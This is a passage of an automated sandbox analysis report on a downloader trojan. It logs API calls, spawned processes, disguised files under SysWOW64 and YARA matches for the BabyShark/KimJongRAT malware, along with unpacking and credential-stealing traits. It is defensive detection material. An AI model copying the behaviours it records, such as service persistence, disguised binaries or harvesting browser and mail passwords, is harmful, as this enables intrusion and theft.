                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9461AE4 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E94695A8 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9469560 NtQueryInformationToken
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E94694B0 NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9488510 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E94650E4 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9461BDC NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9476440 memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPEAX@Z,memset,??_V@YAXPEAX@Z,FindClose,??_V@YAXPEAX@Z
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946B404 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | File created: C:\Windows\SysWOW64\webservices\
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | File deleted: C:\Windows\SysWOW64\webservices\WinRtTracing.exe:Zone.Identifier
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0041A0B6
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004102C6
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004104A3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0042A590
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0043F513
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_00421A1F
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_03584F58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_03584E56
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_03584EC7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_03584DE5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_004038A5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_00409470
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_004010B4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_0040C0BC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_004099E2
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_0040B1F7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_0040123E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_00408325
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_004360CE
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_0040509C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00405199
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_0043C2D0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00440406
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_0040451D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_004045FF
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_0040458E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00404690
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00414A51
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00404C08
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00406C8E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00415DF3
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00416E5C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00410FE4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_004360CE
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_0040509C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00405199
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_0043C2D0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00440406
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_0040451D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_004045FF
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_0040458E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00404690
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00414A51
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00404C08
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00406C8E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00415DF3
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00416E5C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00410FE4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_00404DE5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_00404E56
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_00404EC7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_00404F58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_0040BF6B
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_00404DE5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_00404E56
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_00404EC7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_00404F58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_0040BF6B
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_0000000140004158
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_000000014000D404
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_000000014000C418
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_000000014000CC58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_000000014000C068
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_0000000140001284
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00000001400098B8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00000001400010D8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_000000014000B760
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_0000000140004BB0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946AA8C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9475AA8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9471698
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9473A74
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946A328
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E948D6BC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E94626C0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E94652C0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9462178
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9464D48
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9470D60
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E94871F8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9475228
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9472DC4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946CC90
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9474C7C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9473084
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9467CB0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9462CA0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9461C54
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9476440
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946B110
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E948452C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9470920
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9486CC0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946A4E0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9462F80
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9488744
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9469010
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946B404
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E946D7C0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9487BC0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E9489FE8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: String function: 004134C8 appears 277 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: String function: 00412B98 appears 48 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: String function: 00455D09 appears 38 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 00445190 appears 72 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 00416849 appears 132 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 00412360 appears 36 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 00444C5E appears 36 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 0040924D appears 62 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 00444C70 appears 40 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 00412084 appears 39 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 0042FF22 appears 32 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 004166E8 appears 68 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: String function: 00416A91 appears 176 times
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WinRtTracingoe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WinRtTracingoe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WinRtTracingoe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1278990874.0000000000493000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1280187503.0000000002F00000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1280187503.0000000002F00000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1279445979.0000000002470000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Binary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: 00000006.00000002.1326742844.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 00000001.00000003.1329105049.0000000003580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 1.3.WinRtTracing.exe.3580000.5.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 6.2.WinRtTracing.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 6.2.WinRtTracing.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: classification engine | Classification label: mal100.phis.bank.troj.spyw.evad.winEXE@16/2@0/4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_035B2E40 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0046392F CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0043DBEF __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_035B2E40 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | File created: C:\Users\user\AppData\Local\Microsoft\Outlook
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | File created: C:\Users\user\AppData\Local\Temp\1A19.tmp
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Command line argument: ~`@ (in 3_2_00405FD0)
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | System information queried: HandleInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: WinRtTracing.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: WinRtTracing.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: WinRtTracing.exe, 00000001.00000003.1328991766.00000000037F1000.00000004.00000001.sdmp, WinRtTracing.exe, 00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: WinRtTracing.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: WinRtTracing.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: WinRtTracing.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: WinRtTracing.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe'
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe C:\Windows\SysWOW64\webservices\WinRtTracing.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe 'C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe C:\Windows\SysWOW64\webservices\WinRtTracing.exeJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe 'C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\RPCJump to behavior
                    Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: WinRtTracing.exe
                    Source: Binary string: cmd.pdbUGP source: WinRtTracingoe.exe, 00000007.00000000.1325483578.00007FF6E948E000.00000002.00020000.sdmp, WinRtTracingoe.exe.1.dr
                    Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: WinRtTracing.exe
                    Source: Binary string: cmd.pdb source: WinRtTracingoe.exe, 00000007.00000000.1325483578.00007FF6E948E000.00000002.00020000.sdmp, WinRtTracingoe.exe.1.dr

                    Data Obfuscation:

                    Detected unpacking (changes PE section rights)
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Unpacked PE file: 3.2.WinRtTracing.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Unpacked PE file: 5.2.WinRtTracing.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Unpacked PE file: 6.2.WinRtTracing.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Unpacked PE file: 3.2.WinRtTracing.exe.400000.0.unpack
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Unpacked PE file: 5.2.WinRtTracing.exe.400000.0.unpack
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Unpacked PE file: 6.2.WinRtTracing.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0044112E GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_0044112E
                    Source: WinRtTracingoe.exe.1.dr | Static PE information: section name: .didat
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004185C4 push ebp; retf 0_2_004185C5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_00412FD0 push eax; ret 0_2_00412FFE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004134C8 push eax; ret 0_2_004134E6
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_035B8B87 push FFFFFFB1h; ret 1_3_035B8B89
